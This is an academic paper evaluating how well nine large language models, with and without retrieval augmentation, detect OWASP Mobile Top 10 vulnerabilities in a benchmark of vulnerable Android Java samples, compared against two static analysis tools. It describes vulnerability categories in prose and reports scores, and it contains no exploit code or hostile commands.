¹¹institutetext: European Commission, Joint Research Centre (JRC) 21027 Ispra, Italy
²²institutetext: Department of Information and Communication Systems Engineering, University of the Aegean, Karlovasi, 83200, Samos, Greece

Assessing the Effectiveness of LLMs in Android Application Vulnerability Analysis

Vasileios Kouliaridis 11 Georgios Karopoulos 11 Georgios Kambourakis 22

Abstract

The increasing frequency of attacks on Android applications coupled with the recent popularity of large language models (LLMs) necessitates a comprehensive understanding of the capabilities of the latter in identifying potential vulnerabilities, which is key to mitigate the overall risk. To this end, the work at hand compares the ability of nine state-of-the-art LLMs to detect Android code vulnerabilities listed in the latest Open Worldwide Application Security Project (OWASP) Mobile Top 10. Each LLM was evaluated against an open dataset of over 100 vulnerable code samples, including obfuscated ones, assessing each model’s ability to identify key vulnerabilities. Our analysis reveals the strengths and weaknesses of each LLM, identifying important factors that contribute to their performance. Additionally, we offer insights into context augmentation with retrieval-augmented generation (RAG) for detecting Android code vulnerabilities, which in turn may propel secure application development. Finally, while the reported findings regarding code vulnerability analysis show promise, they also reveal significant discrepancies among the different LLMs.

Keywords:

Large Language Models, Vulnerability analysis, Code analysis, OWASP, Mobile security, Android, Retrieval-Augmented Generation.

1 Introduction

As mobile devices continue to proliferate, the need for secure software development practices remains still of high priority. The predominant Android platform has become a prime target for attackers and malware writers, seeking to exploit vulnerabilities in the vast cosmos of mobile applications [1]. The importance and volume of mobile vulnerabilities has led the Open Web Application Security Project (OWASP) to periodically publish a current, reputable list of the most prevalent vulnerabilities detected in mobile applications, namely OWASP Mobile Top 10. [2]. This list can serve as a key benchmark in assessing the performance of any tool in finding software vulnerabilities [3].

An emerging approach to detecting Android code vulnerabilities is the use of large language models (LLMs) for code analysis. Actually, the use of LLMs for code analysis is traced back to the early 2010s. That is, in 2013, the introduction of Word2Vec [4], a shallow neural network, marked the beginning of deep learning-based language models. That algorithm was capable of learning word embeddings (an encoding of the meaning of the word) from large datasets. In 2018, Google introduced Word2Vec’s successor, a language model known as Bidirectional Encoder Representations from Transformers (BERT) [5]. BERT was designed to be bidirectionally trained, meaning it can learn information from both the left and right sides of a given text during training, therefore obtaining a better understanding of the context.

In the realm of code analysis, LLMs began to gain traction around 2017. One of the early applications of LLMs in code analysis was code completion. Models like GPT-2 [6], fully released in Nov. 2019, were trained on a large corpus of source code data. By understanding the structure and context of the code, these models could predict the most likely code to follow a given input. In 2020, OpenAI [7] introduced GPT-3 [8], a significantly larger model with 175B parameters. This model showed improved capabilities in generating human-like text and was even able to generate code when given a task description. The ability of LLMs to analyze and understand code has also been demonstrated in recent studies [9, 10]. Nevertheless, to the best of our knowledge, the literature lacks a comprehensive comparison of the ability of these models to detect Android code vulnerabilities so far.

The present work aims to fill this gap by comparing the ability of nine state-of-the-art LLMs to detect Android code vulnerabilities listed in the OWASP Mobile Top 10. Specifically, each model is evaluated regarding its performance in identifying key vulnerabilities against a dataset comprising snippets of vulnerable Android code. The assessment of each model is done through a combination of manual and automated evaluation methods. We additionally pinpoint the strengths and weaknesses of each LLM and provide insights into the factors that conduce to their performance. Overall, this study provides valuable insights into the use of LLMs for detecting mobile code vulnerabilities, thus contributing to the development of effective methods for secure mobile coding. The contributions of the paper are summarized as follows.

•

We present a thorough comparative analysis on the capabilities and performance of nine leading LLMs, i.e., GPT 3.5, GPT 4, GPT 4 Turbo, Llama 2, Zephyr Alpha, Zephyr Beta, Nous Hermes Mixtral, MistralOrca, and Code Llama in identifying vulnerabilities residing in Android applications. The experiments conducted provide concrete evidence of the LLMs’ capabilities for such tasks, also identifying the limitations per LLM. These insights are critical for anyone interested in understanding the trade-offs associated with each LLM.
•

We provide a comparison between the code analysis results as given by the nine LLMs against two well-known, publicly available static application security testing (SAST) tools, namely, Bearer [11] and MobSFscan [12].
•

We examine the impact of context augmentation on LLMs and contribute a set of guidelines regarding the selection and fine-tuning of LLMs towards enhancing the security posture of Android code.
•

We offer an open dataset to the community for driving research in this field forward.

The remainder of this paper is structured as follows. The next section presents previous work on the use of LLM for code vulnerability analysis. Section 3 details our methodology, while the results per LLM are given in section 4. The last section concludes and proposes some lines for future research.

2 Previous work

In recent years, LLMs have gained significant attention in the field of cybersecurity for their potential to provide assistance in various domains, including vulnerability detection, penetration testing, and security analysis. State-of-the-art surveys such as [13, 14] and [15], as well as a more recent but not yet peer-reviewed study [16], provide comprehensive overviews of the current state and potential future applications of LLMs in cybersecurity. These works analyze the challenges, practical implications, and future research directions to exploit the full potential of these models in ensuring cyber resilience. The rest of this section will focus on literature dealing with software vulnerability analysis using LLMs. This includes works that have already been peer-reviewed, as well as more recent research that has been self-archived for the sake of completeness.

In [17], transformer-based LLMs are evaluated in the task of code vulnerability detection. The authors evaluate such LLMs, including BERT, DistilBERT, CodeBERT, GPT-2 and Megatron, against C/C++ source code snippets from two publicly available datasets. The results showed that LLMs perform well in software vulnerability tasks; indicatively, the best scoring model, GPT-2, had an F1-score above 95% in all tests. In the context of software engineering, [18] investigates the use of in-context learning to improve the ability of LLMs to detect software vulnerabilities, showcasing the adaptability of LLMs to learn from context-specific examples. The authors use code retrieval to search for code snippets that are similar to the examined code and feed them to the LLM together with the examined code and its analysis. Their experimental results show that this approach has better performance than the original GPT model.

Another set of works, adds verification in the vulnerability detection process. An empirical study of using LLMs for vulnerability assessment in software was conducted in [19]. The authors used four well-known pre-trained LLMs to identify vulnerabilities in two labeled datasets, namely code gadgets and CVEfixes, and static analysis as a reference point. The used LLMs include GPT-3.5, Davinci and CodeGen, and the analysis was limited to two kinds of vulnerabilities: SQL injections and buffer overflows. The study concluded that LLMs do not perform well at detecting vulnerabilities, presenting high false-positive rates, but could complement and improve the traditional static analysis process. Concerns about the safe use of code assistants are addressed in [20]. In this case, LLMs are used to produce code which is then assessed manually and using static analysis. This study provides empirical insights into how developers interact with LLMs, underscoring the importance of user awareness to mitigate security risks associated with assisted code generation.

Moving to non peer-reviewed works, the work of [21] delves into the application of LLMs in static binary taint analysis, demonstrating how these models can assist in vulnerability inspection of binaries. A binary is first disassembled and decompiled, and an LLM is used to identify security sensitive functions that may contain vulnerabilities, as well as candidate dangerous flows. In the last phase, the LLM combines the previous results to produce a vulnerability report for the examined binary. The authors of [22] propose DefectHunter, a vulnerability detection mechanism that combines various technologies, including LLMs. Its architecture has three main building blocks: a tool for extracting structural information from code snippets, a pre-trained LLM for generating semantic information, and a Conformer mechanism to identify vulnerabilities from the previously extracted structural and semantic data.

The authors of [23] evaluated ChatGPT and GPT-3 in detection of Common Weakness Enumeration (CWE) vulnerabilities contained in code. Using a custom real-world dataset with Java files from open GitHub repositories, they concluded that the detection capabilities of the aforementioned models are limited. In [24], an empirical study of the potential of LLMs for detecting software vulnerabilities is presented. The authors tested 129 code samples from various GitHub repositories, written in eight different languages, and their results showed that GPT-4 identified around four times more vulnerabilities than traditional, rule-based, static code analysis tools. In addition, the LLMs were asked to provide fixes for the identified vulnerabilities. The models used include GPT-3 and GPT-4.

Apart from generic code, LLMs have been used for detecting vulnerabilities in smart contracts. LLM4Vuln [25] is an evaluation framework for vulnerability detection systems based on LLMs, focusing on smart contract vulnerabilities. The difference from other similar works is that, instead of benchmarking the performance of LLMs in vulnerability detection, the authors evaluate the vulnerability reasoning capabilities of each model. Similarly, the authors of [26] proposed GPTLens, a framework for detecting vulnerabilities in smart contracts using LLMs. GPTLens takes a different approach from the traditional one-stage detection in order to decrease false positives. The detection process is broken down in two steps, where the LLM takes two different roles: auditor and critic. As an auditor, the LLM provides a large range of vulnerabilities for the examined contract, whereas as a critic it verifies the claims produced in the first step. The performed experiments show that GPTLens presents improved results over the single-stage vulnerability detection.

3 Methodology

This section details our methodology, including the creation of the benchmark dataset, the selection of LLMs, and the evaluation process.

3.1 Dataset

Also with reference to Section 2, to our knowledge, there is no publicly available dataset containing vulnerable Android code covering each one of the OWASP Mobile Top 10 vulnerabilities. The most relevant dataset to our study is LVDAndro [27], which however is labelled based on CWE. Additionally, since LVDAndro was created using actual Android applications, it contains a significant proportion of non-vulnerable code. In view of this shortage, for the needs of our experiments, we created a new dataset coined Vulcorpus [28] containing 100 pieces of vulnerable code. It is important to note that the term “piece of code”, hereafter called sample, refers to a part of an application, not its full codebase. All the samples were written in Java by exploiting common insecure coding practices, e.g., logging private information, not filtering input/objects, etc., and target the Android OS. However, obviously, the same vulnerabilities apply to other mobile platforms, say, iOS.

More specifically, Vulcorpus contains 10 samples for each of the OWASP Mobile Top-10 vulnerabilities of 2024, which are briefly explained in subsection 3.2. Every sample exhibits one or maximum two interrelated vulnerabilities, while one or two of these samples per vulnerability category are obfuscated using the well-known renaming technique. Half of the samples per vulnerability contain code comments regarding the specific vulnerability. Moreover, to assess each LLM in detecting privacy-invasive code, we created three more samples which perform risky actions without asking the user for confirmation. These actions are:

•

Get the precise location of the device through the “android.permission.ACCESS_FINE_LOCATION” permission, and directly share the latitude and longitude over the Internet via API. According to the Android API [29], this permission has a “dangerous” protection level, namely it may give the requesting application access to user’s private data, among others.
•

Capture an image via the “ACTION_IMAGE_CAPTURE” intent [30], and subsequently attempt to share the captured image file via API.
•

Open local documents through the “ACTION_OPEN_DOCUMENT” intent [31], and attempt to send them to a remote host via API.

The latter three samples are also available at [28] along with Vulcorpus.

3.2 List of vulnerabilities

This subsection briefly delineates each vulnerability contained in the current OWASP Mobile Top 10 list. For more details regarding each vulnerability, the reader is referred to [2]. It is important to note that the list differs from its 2016 version, given that four vulnerabilities contained in the 2016 list have been replaced with new ones in the current list. The reader should also keep in mind that while some categories of vulnerabilities, say, M5 are straightforward, others might be more complicated for LLMs to understand, such as the M7.

Improper credential usage (M1): Poor credential management can lead to severe security issues, namely, unauthorized users may be able to gain access to sensitive information or administrative functionalities within the mobile app or its backend systems. This in turn leads to data breaches and fraudulent activities.

Inadequate supply chain security (M2): By exploiting vulnerabilities in the mobile supply chain, attackers may be able to manipulate application functionality. For example, they can insert malicious code into the mobile application’s codebase or libraries [32], as well as modify the code during the application’s build process to introduce backdoors, spyware, or other type of malware. The attacker can also exploit vulnerabilities in third-party software libraries, software development kits (SDKs), or hard-coded credentials to gain access to the mobile app or the backend servers. Overall, this type of vulnerabilities can lead to unauthorized data access or manipulation, denial of service, or complete takeover of the mobile application or device.

Insecure authentication/authorization (M3): Poor authorization could lead to the destruction of systems or unauthorized access to sensitive information, while poor authentication results in the inability to identify the user making an action request, leading to the inability to log or audit user activity. This situation makes it difficult to detect the source of an attack, understand any underlying exploits, or develop strategies to prevent future attacks. Obviously, authentication failures are tightly coupled to authorization failures; when authentication controls fail, authorization cannot be performed. That is, if an attacker can anonymously execute sensitive functionality, it indicates that the underlying code is not verifying the user’s permissions, highlighting failures in both authentication and authorization controls.

Insufficient input/output validation (M4): A mobile application that does not adequately validate and sanitize data from external sources, like user inputs or network data, is susceptible to a range of attacks, including SQL injection, command injection, and cross-site scripting. Insufficient output validation can also lead to data corruption or presentation vulnerabilities, possibly allowing the malicious actor to inject harmful code or manipulate sensitive information shown to the users.

Insecure communication (M5): Modern mobile applications typically communicate with one or more remote servers. This renders user data susceptible to interception and modification, if they are transmitted in plaintext or using an outdated encryption protocol.

Inadequate privacy controls (M6): Privacy controls aim to safeguard Personally Identifiable Information (PII), including names and addresses, credit card details, emails, and information related to health, religion, sexuality, and political opinions. This sensitive information can be used to impersonate the victim for fraudulent activities, misuse their payment data, blackmail them with sensitive information, or harm them by destroying or manipulating sensitive data.

Insufficient binary protections (M7): The application’s binary may hold valuable information, such as commercial API keys or hard-coded cryptographic secrets. Furthermore, the code within the binary itself could be valuable, for instance, containing critical business logic or pre-trained AI models. In addition to gathering information, attackers may also manipulate app binaries to gain access to paid features for free or to bypass other security controls. In the worst-case scenario, popular apps could be altered to include malicious code and then distributed through third-party app stores or under a new name to deceive unsuspecting users.

Security misconfiguration (M8): These occur when security settings, permissions, or controls are improperly configured, leading to vulnerabilities and unauthorized access.

Insecure data storage (M9): Such vulnerabilities may stem from weak encryption, insufficient data protection, insecure data storage mechanisms, and improper handling of user credentials.

Insufficient cryptography (M10): The use of obsolete cryptographic suites, primitives, or cryptographic practices may lead to loss of data confidentiality, integrity, and inability to impose source authentication among others. Typical repercussions include data decryption, manipulation of cryptographic processes, leak of encryption keys, etc.

3.3 Selection of LLM

For the purposes of our experiments, nine contemporary, well-known LLMs were chosen: three commercial models, i.e., GPT 3.5, GPT 4, and GPT 4 Turbo, and six open source models, i.e., Llama 2, Zephyr Alpha, Zephyr Beta, Nous Hermes Mixtral, MistralOrca, and Code Llama. According to their documentation, these models have been pre-trained on large amounts of text data, including code, having demonstrated performance in various software engineering tasks, including code analysis. That is, their ability to understand code syntax and semantics makes them well-suited for identifying vulnerabilities residing in code. Additionally, their large size and diverse training data make them less likely to overfit to a specific codebase. A succinct description of each LLM is given below.

•

GPT 3.5 (gpt-35-turbo version Nov. 2023) [33]: It is a powerful language model that has been pre-trained on a large corpus of text data, including code. It has demonstrated performance in various natural language processing (NLP) tasks and has been used for code analysis tasks such as code completion, code search, and code summarization.
•

GPT 4 [34], [35]: It is the newest version of GPT being pre-trained on an even larger corpus of text data, including code. It has demonstrated improved performance over GPT 3.5 in various NLP tasks and has been used for code analysis, including code review and repair.
•

GPT 4 Turbo (gpt-4-1106): It is a variant of GPT 4, been specifically designed for tasks that require faster inference times, such as code analysis. It has been pre-trained on the same large corpus of text data as GPT 4, optimized for faster performance.
•

Llama 2 (Llama-2-70b-chat) [36]: This LLM has been pre-trained on a diverse set of text data, including code. It has demonstrated performance in various NLP tasks, also been exploited for code analysis, including code summarization and code search.
•

Zephyr Alpha (zephyr-7b-alpha) [37]: It is pre-trained on a huge corpus of text data from diverse sources, including books, articles, and websites. This model has been fine-tuned with a mix of publicly available and synthetic datasets on top of Mistral LLM. Despite its small size (7B parameters), it potentially shows a performance comparable to several models with a number of parameters in the range of 20-30B.
•

Zephyr Beta (zephyr-7b-beta) [37]: This model has been fine-tuned with a mix of publicly available and synthetic datasets on top of Mistral LLM. It is the successor of Zephyr Alpha, therefore considered significantly more powerful than its predecessor. Based on its documentation, it is fast and competent, showing a performance comparable to the best open-source models, having around 70B parameters.
•

Nous Hermes Mixtral (nous-hermes-2-mixtral-8x7b-dpo) [38]: It is one of the most powerful open-source models available, comprising a fine-tuned version of Mixtral base model.
•

MistralOrca (mistral-7b-openorca [39], [40], [41]: It has been fine-tuned with Open-Orca datasets on top of Mistral LLM. Despite its small size, it outperforms Llama 2 13B, showing a performance comparable to several models with a number of parameters in the range of 20-30B.
•

Code Llama [42]: It is a special version of Llama 2, tailored specifically for coding applications. This specialized version has been refined through extensive additional training on code-focused data, with prolonged exposure to relevant datasets. The result is a tool with alleged superior coding proficiency that builds upon the foundation of Llama 2. More specifically, Code Llama can generate code and create explanations about code in response to prompts in both programming and natural language. Its capabilities extend to assisting with code completion and troubleshooting code errors. Furthermore, Code Llama is versatile, supporting a broad array of widely-used programming languages, including Python, C++, Java, PHP, JavaScript, C Sharp, and Bash. In this work, we examine the smallest pre-trained model, namely, the 7B version. In addition, for this LLM, in a separate run, we employed LlamaIndex [43] to improve the detection capabilities of Code Llama. LlamaIndex is a data framework for LLM-based applications, enhancing them with additional contextual data. This context augmentation technique is called Retrieval-Augmented Generation (RAG) and can be used to address the restrictions of LLMs by giving them access to contextual, current data. For the RAG process, we used the 50% of Vulcorpus, i.e., only the samples that contain code comments regarding the specific vulnerability. Android’s application quality and security guidelines and code examples [44] were also added as input to the RAG, along with information on each vulnerability from the OWASP website [2].

3.4 Evaluation process

All nine pre-trained LLMs listed in subsection 3.3, except Code Llama, run on the GPT@JRC platform, a system developed by the European Commission’s Joint Research Centre (JRC). Code Llama was run on a local computer with an M2 processor and 16GB unified memory. Each LLM was fed with Vulcorpus for comparing its performance on identifying potential vulnerabilities and proposing code improvements. To this end, as detailed in Section 4, we use a simple scoring system to present (a) the number of vulnerabilities each LLM was able to detect, and (b) if the LLM proposed valid suggestions for possibly fixing the vulnerability. Both these partial scores have a maximum value of 10/10 per vulnerability category, i.e., one point for each piece of vulnerable code the LLM was able to detect and annotate. It is important to note that the input or question given to each LLM has a major effect on its output. For our study, each LLM was queried as follows: “Check if there are any security issues in the following code; if there are, explain the issue”.

As previously mentioned, the LLMs used in this work are pre-trained. This means that the associated libraries, possibly needed by each code sample but not included in the input, cannot be analyzed. This mostly affects the analysis regarding the M2 vulnerability. Therefore, to evaluate LLMs against M2, instead of Java code, we used 10 libraries with known vulnerabilities as input. These libraries, also included in Vulcorpus for reasons of reproducibility, were published before the training date of each LLM.

At a final stage, as detailed in Section 4, the results of each LLM were compared and crosschecked against those produced by two well-known SAST tools, namely Bearer [11] and MobSFscan [12]. Bearer is a static application security testing tool, which uses built-in rules covering the OWASP Top 10 and Common Weakness Enumeration (CWE) Top 25. MobSFscan is a static analysis tool that uses MobSF’s [45] security rules and can find insecure code patterns in Android or iOS source code. Finally, we also assessed the performance of each LLM in detecting privacy-invasive behaviors, using the three samples detailed in subsection 3.1. The output was rated using three categories: not privacy-invasive, (b) potentially privacy-invasive, and (c) privacy-invasive.

4 Results

Tables 1 and 2 recapitulate the results for each LLM. Particularly, each line of Table 1 indicates if the specific model Detected the vulnerability (denoted with the letter “D”), and if it explained the situation and provided a valid solution for Improving the code (denoted with the letter “I”). Actually, the “I” aspect is a key factor in evaluating each LLM (also against each other), as this is the sole indicator of whether the LLM actually “perceives” the security issue.

Table 1: Vulnerability analysis results. The letters “D” and “I” stand for the number of vulnerable samples detected and the number of vulnerable samples for which the LLM suggested improvements, respectively. Top scores per vulnerability are in boldface. The asterisk exhibitor stands for Code Llama without RAG.

LLM	M1		M2		M3		M4		M5		M6		M7		M8		M9		M10		Mean
LLM	D	I	D	I	D	I	D	I	D	I	D	I	D	I	D	I	D	I	D	I	D	I
GPT-3.5	3	3	7	N/A	2	3	2	3	8	6	3	5	5	4	3	5	4	6	5	2	4.2	4.1
GPT-4	10	10	0	N/A	6	7	6	8	5	10	10	10	6	9	7	10	8	10	9	9	6.7	9.2
GPT-4 TURBO	4	5	0	N/A	3	5	5	8	8	9	6	8	4	4	7	10	7	9	6	8	5	7.3
Nous Hermes Mixtral	1	3	6	N/A	1	3	9	5	6	8	8	8	7	3	9	9	8	10	7	7	6.2	6.2
Mistral Orca	9	9	0	N/A	2	2	4	4	5	5	0	0	3	4	0	1	10	10	4	3	3.7	4.2
Zephyr Alpha	0	0	3	N/A	6	6	5	5	10	10	7	8	2	2	7	7	3	10	10	10	5.3	6.4
Zephyr Beta	0	8	0	N/A	9	9	8	8	10	10	0	8	3	0	5	4	10	0	9	9	5.4	6.2
Llama 2	0	0	0	N/A	0	10	4	5	10	0	6	6	0	0	0	0	4	4	6	6	3	3.4
Code Llama*	9	5	3	N/A	9	4	8	4	10	5	8	5	9	4	9	4	7	7	9	6	8.1	4.9

Table 2: Results per LLM regarding privacy-invasive actions. N: not privacy-invasive, P: potentially privacy-invasive, Y: privacy-invasive.

LLM	Location	Camera	Files
GPT 3.5	Y	P	P
GPT 4	N	P	N
GPT 4 Turbo	P	Y	P
Nous Hermes Mixtral	Y	P	P
MistralOrca	N	N	N
Zephyr Alpha	Y	P	Y
Zephyr Beta	Y	P	N
Llama 2	P	Y	N
Code Llama	N	N	Y
Code Llama + RAG	N	Y	P

Overall, with reference to Table 1, the best performers in terms of total vulnerabilities detected, are Code Llama (81/100), GPT 4 (67/100), Nous Hermes Mixtral (62/100), Zephyr Beta (54/100), and Zephyr Alpha (53/100), followed by GPT 4 TURBO (50/100), GPT 3.5 (42/100), MistralOrca (37/100), and Llama 2 (30/100). On the other hand, the best performers, in terms of total code improvement suggestions, are GPT 4 (83/90), GPT 4 Turbo (66/90), Zephyr Alpha (58/90), Zephyr Beta (56/90), and Nous Hermes Mixtral (56/90), followed by Code Llama (44/90), MistralOrca (38/90), GPT 3.5 (37/90), and Llama 2 (31/90). Overall, GPT 4 poses as the top performer, considering a composite score of high “D” and high “I”. On the other hand, LLMs like Code Llama, which do identify the correct vulnerability, but fail to provide corrections or suggestions regarding the problematic lines of code may indicate an insufficiently trained model for this type of analysis.

When looking at each vulnerability individually, GPT 4 achieved a perfect score for M1 and M6, MistralOrca for M9, Zephyr alpha for M5 and M10, Zephyr beta for M5 and M9, and Llama 2 and Code Llama for M5. Regarding the rest of the vulnerabilities, namely, M2, M3, M4, M7, and M8, the best performers were GPT 3.5 (7/10), Zephyr Beta and Code Llama (9/10), Nous Hermes Mixtral (9/10), Code Llama (9/10), and Nous Hermes Mixtral and Code Llama (9/10), respectively. Concerning M2, recall from subsection 3.4 that it was tested using 10 vulnerable libraries published before the training date of each LLM. Even so, the M2 low detection performance in Table 1 for all the LLMs but GPT-3.5 may designate that these libraries were not considered during LLM training, so the respective scores can be regarded only as indicative. The same applies to the “I” score for M2, which it is marked as N/A. As discussed in subsection 3.3, to address these limitations, LLMs used for vulnerability detection can capitalize on context augmentation; this way the LLM is provided with access to contextual, up-to-date data.

After averaging the “D” score for all the nine LLMs, we sort in ascending order the OWASP Top 10 vulnerabilities in Table 3. This mean score provides an estimation of the detection difficulty per vulnerability as experienced by the different LLMs. The same table also includes the best performer(s) along with its score in parentheses. As observed from the table, from an LLM viewpoint, M2 is the toughest vulnerability with an average score of 2.11. As explained in subsection 3.4, this poor outcome is conceivably due to lack of sufficient, up-to-date information at the LLMs’ side. Generally, this low score is somewhat expected, as for this vulnerability the LLMs are checking for known security issues in a list of libraries instead of analyzing the application’s code. On the other hand, the highest average detection score was observed in M5, where four LLMs achieved a perfect score.

Table 3: LLM average detection score per vulnerability. The asterisk exhibitor stands for Code Lama without RAG.

Vulnerability	Best performer	Ave. score
M2	GPT 3.5 (7)	2.1
M1	GPT 4 (10)	4
M7	Code Llama* (9)	4.33
M3	Zephyr Beta (9), Code Llama* (9)	4.33
M8	Nous Hermes Mixtral (9), Code Llama* (9)	5.22
M6	GPT 4 (10)	5.33
M4	Nous Hermes Mixtral (9)	5.66
M9	MistralOrca (10), Zephyr Beta (10)	6.77
M10	Zephyr Alpha (10)	7.22
M5	Zephyr Alpha (10), Zephyr Beta (10), Llama 2 (10), Code Llama* (10)	8

No less important, with reference to the last stage of the experiments as given in subsection 3.4, regarding the detection of privacy-invasive actions, six, eight, and six of the LLMs correctly perceived potential privacy-invasive actions for location, camera, and local file sharing, respectively. The best performer was Zephyr Alpha, which clearly marked two out of three codes as privacy-invasive and the other as potentially privacy-invasive. The worst performer in this type of experiments was MistralOrca, which was unable to detect any possible privacy-invasive actions.

Additionally, Table 4 presents the results regarding the use of RAG on Code Llama. As explained in subsection 3.3, in this experiment, only half of the samples per vulnerability were indexed for RAG, along with text and code examples from Android’s app security guidelines [44] and all the CVEs related to the vulnerable libraries used for M2. After that, we analyzed the other half of the samples, i.e., the non-annotated ones with comments on the particular vulnerability. As observed from Table 4, the results show improvements in both the detection performance and the generation of code suggestions vis-à-vis the base model. Precisely, by feeding a large list of vulnerable libraries, the optimized Code Llama model achieved a perfect score for M2, an improvement of approximately 233% compared to that in Table 1. Nevertheless, for reaching this performance in real-world scenarios, the RAG process should involve an up-to-date dataset comprising known vulnerable library versions. Interestingly, except M2, the optimized Code Llama model detected the vulnerabilities and suggested improvements for all the M1, M3, M4, M5, M6, and M7 samples. As seen in the three bottom lines of Table 4, a nearly perfect performance (4/5) was also observed for all the M8, M9, and M10 samples.

Table 4: Evaluation results for Code Llama with RAG. The letters “D” and “I” stand for the number of vulnerable samples detected and the number of vulnerable samples for which the LLM suggested improvements, respectively.

Vulnerability	D	I
M1	5/5	5/5
M2	10/10	N/A
M3	5/5	5/5
M4	5/5	5/5
M5	5/5	5/5
M6	5/5	5/5
M7	5/5	5/5
M8	4/5	4/5
M9	4/5	5/5
M10	4/5	5/5

As previously mentioned, the performance of the LLMs was also compared against two reputable SASTs, namely Bearer and MobSFscan. Precisely, as shown in Table 5, across the 100 samples of Vulcorpus, Bearer found 29 security issues, while MobSFscan detected 12 issues. Excluding M2, this result suggests that, for several vulnerability types, the performance of at least some of the LLMs may significantly or even by far surpass that of well-known SASTs. For instance, comparing the numbers of Table 5 with the average scores of Table 3 it can be argued that the former observation applies especially to M3, M4, and M9, and in a smaller extent to M1, M6, and M7. Moreover, a side conclusion is that both the LLMs and SASTs score well in certain vulnerabilities, i.e., M10, and to a lesser extent M5; nevertheless, this is somewhat expected given that vulnerabilities of these two types are generally considered easier to detect.

Table 5: Results of prominent SASTs

SAST	M1	M2	M3	M4	M5	M6	M7	M8	M9	M10	Total
Bearer	2	N/A	0	1	6	3	3	4	3	7	29
MobSFscan	2	N/A	0	0	1	1	1	3	0	4	12

5 Conclusions

Our study provides empirical evidence regarding the effectiveness of using LLMs for Android code vulnerability analysis. GPT-4 and Code Llama emerged as the top performers among the nine LLMs tested, the latter excelling in detection, but failing to provide sufficient code improvements, and the former showing promising results both in detection and code improvement. Notably, the study highlights the superior performance of specific LLMs for particular types of vulnerabilities. For instance, MistralOrca and Zephyr Beta performed exceptionally well for M9, while Zephyr Alpha excelled in M10. These findings suggest that while some LLMs have a general proficiency in vulnerability detection, others may be more specialized, indicating the potential for strategic selection of LLMs based on the targeted vulnerability type. When comparing open LLM models with commercial ones, we can see that the open models were the best performers in seven out of ten categories of vulnerabilities, i.e., M3, M4, M5, M7, M8, M9, M10. On the other hand, considering mean detection and improvements scores, as presented in Table 1, the situation is mixed.

Our findings also reveal that while some LLMs are capable of detecting Android code vulnerabilities, their overall performance is still in an early stage. For example, several LLMs struggled with M7, while others were unable to identify M2, reflecting the inherent complexity and subtlety of such vulnerabilities. This outcome points to a need for further research towards enhancing LLMs’ capabilities in more nuanced areas of Android security. As an additional step, we evaluated the use of RAG in fine-tuning LLMs for vulnerability analysis, with our results demonstrating that RAG can significantly reinforce detection performance. Regarding the detection of privacy-invasive actions, the obtained results indicate a mixed level of sensitivity among the LLMs, with Zephyr Alpha being the top performer. However, MistralOrca’s inability to identify any potential privacy-invasive actions underscores the variability in performance and the need for increased model robustness in privacy analysis concerning mobile platforms. No less important, after comparing the performance of LLMs with that of well-respected SASTs on the same set of vulnerable samples, it can be said that the former seem more adept at identifying code vulnerabilities.

Altogether, the results of the present study provide valuable insights into the current state of LLMs in Android vulnerability detection. While certain models show high efficacy, there is ample room for improvement and targeted optimizations, particularly in addressing complex and subtle vulnerabilities. Nevertheless, for obtaining a more complete view, more experiments with larger datasets are needed.

References

[1] Lookout. Mobile Threat Landscape Report: 2023 in Review. https://www.lookout.com/threat-intelligence/report/mobile-landscape-threat-report, 2023. last visited 10/3/2024.
[2] OWASP. Mobile Top 10 2024: Final Release Updates. https://owasp.org/www-project-mobile-top-10/, 2024. last visited 10/3/2024.
[3] Vasileios Kouliaridis, Georgios Karopoulos, and Georgios Kambourakis. Assessing the security and privacy of android official id wallet apps. Information, 14(8), 2023.
[4] Kenneth Ward Church. Word2vec. Natural Language Engineering, 23(1):155–162, 2017.
[5] Jacob Devlin, Ming-Wei Chang, Kenton Lee, and Kristina Toutanova. Bert: Pre-training of deep bidirectional transformers for language understanding, 2019.
[6] Irene Solaiman, Miles Brundage, Jack Clark, Amanda Askell, Ariel Herbert-Voss, Jeff Wu, Alec Radford, Gretchen Krueger, Jong Wook Kim, Sarah Kreps, Miles McCain, Alex Newhouse, Jason Blazakis, Kris McGuffie, and Jasmine Wang. Release strategies and the social impacts of language models, 2019.
[7] OpenAI. OpenAI. https://openai.com/, 2024. last visited 10/3/2024.
[8] Tom B. Brown et al. Language models are few-shot learners, 2020.
[9] Yao Wan, Wei Zhao, Hongyu Zhang, Yulei Sui, Guandong Xu, and Hai Jin. What do they capture? a structural analysis of pre-trained language models for source code. In Proceedings of the 44th International Conference on Software Engineering, ICSE ’22, page 2377–2388, New York, NY, USA, 2022. Association for Computing Machinery.
[10] Jiawei Liu, Chunqiu Steven Xia, Yuyao Wang, and Lingming Zhang. Is your code generated by chatgpt really correct? rigorous evaluation of large language models for code generation, 2023.
[11] Bearer. https://github.com/Bearer/bearer. last visited 10/3/2024.
[12] Mobsfscan. https://github.com/MobSF/mobsfscan. last visited 10/3/2024.
[13] M. Al-Hawawreh, A. Aljuhani, and Y. Jararweh. Chatgpt for cybersecurity: practical applications, challenges, and future directions. Cluster Computing, 26:3421–3436, 2023.
[14] Yifan Yao, Jinhao Duan, Kaidi Xu, Yuanfang Cai, Zhibo Sun, and Yue Zhang. A survey on large language model (llm) security and privacy: The good, the bad, and the ugly. High-Confidence Computing, 4(2):100211, 2024.
[15] Maanak Gupta, Charankumar Akiri, Kshitiz Aryal, Eli Parker, and Lopamudra Praharaj. From chatgpt to threatgpt: Impact of generative ai in cybersecurity and privacy. IEEE Access, 11:80218–80245, 2023.
[16] Farzad Nourmohammadzadeh Motlagh, Mehrdad Hajizadeh, Mehryar Majd, Pejman Najafi, Feng Cheng, and Christoph Meinel. Large language models in cybersecurity: State-of-the-art, 2024.
[17] Chandra Thapa, Seung Ick Jang, Muhammad Ejaz Ahmed, Seyit Camtepe, Josef Pieprzyk, and Surya Nepal. Transformer-based language models for software vulnerability detection. In Proceedings of the 38th Annual Computer Security Applications Conference, ACSAC ’22, page 481–496, New York, NY, USA, 2022. Association for Computing Machinery.
[18] Zhihong Liu, Qing Liao, Wenchao Gu, and Cuiyun Gao. Software vulnerability detection with gpt and in-context learning. In 2023 8th International Conference on Data Science in Cyberspace (DSC), pages 229–236, 2023.
[19] Moumita Das Purba, Arpita Ghosh, Benjamin J. Radford, and Bill Chu. Software vulnerability detection using large language models. In 2023 IEEE 34th International Symposium on Software Reliability Engineering Workshops (ISSREW), pages 112–119, 2023.
